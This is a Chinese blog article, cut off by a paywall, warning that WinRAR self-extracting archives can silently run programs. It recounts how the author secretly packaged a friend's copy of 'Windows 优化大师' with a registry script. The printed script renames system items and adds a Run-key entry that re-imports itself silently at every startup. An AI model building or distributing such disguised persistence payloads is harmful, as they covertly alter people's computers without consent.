本文揭示了WinRAR自解压程序可能带来的安全问题。作者通过实例展示了如何利用WinRAR创建一个自解压包,该包在解压后能够自动运行程序并修改注册表,从而对用户的电脑进行定制化设置,甚至可能导致恶意行为。提醒用户谨慎对待未知的自解压文件,以防止潜在的系统篡改或恶意软件感染。
作者:数据恢复
与Winzip相比,Winrar3.0的自解压程序要多出功能。其中一项最为突出的功能,也是潜在着最大危险的是:它可以在解压前或解压后,无声无息地自动运行程序。
如果你不以为然,先看完以下事例:
几天前,一位朋友要我copy一份我从网上下载的'Windows 优化大师’给他,我灵机一动,想起这几天研究Winrar3.0的心得,便满口答应。到了晚上,我花了几小时的时间为他特制了一份'Windows 优化大师’,制作流程如下:建立一个注册表脚本文件,我取的文件名为regeditt.reg在里面写入:
REGEDIT4
[HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion]
"Registered Owner"="××"
[HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}]
@="××""InfoTip"="包含可以恢复或永久删除的已删除项目。"
[HKEY_USERS/.DEFAULT/Software/Classes/CLSID/{20D04FE0-3AEA-1069-A2D8-08002B30309D}]
@="××的电脑"
[HKEY_CURRENT_USER/Control Panel/International]
"StimeFormat"="×× HH:mm"
[HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run]
"TaskMonitoy"="regedit /s c://Windows//sysbckup
//regeditt.reg"
注:以上××均是不健康的调侃他人的词汇,编辑对它们做了净化。
上面第一项是更改计算机注册名称,第二项是更改'回收站’名称,
最低0.47元/天 解锁文章
扫一扫
573
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
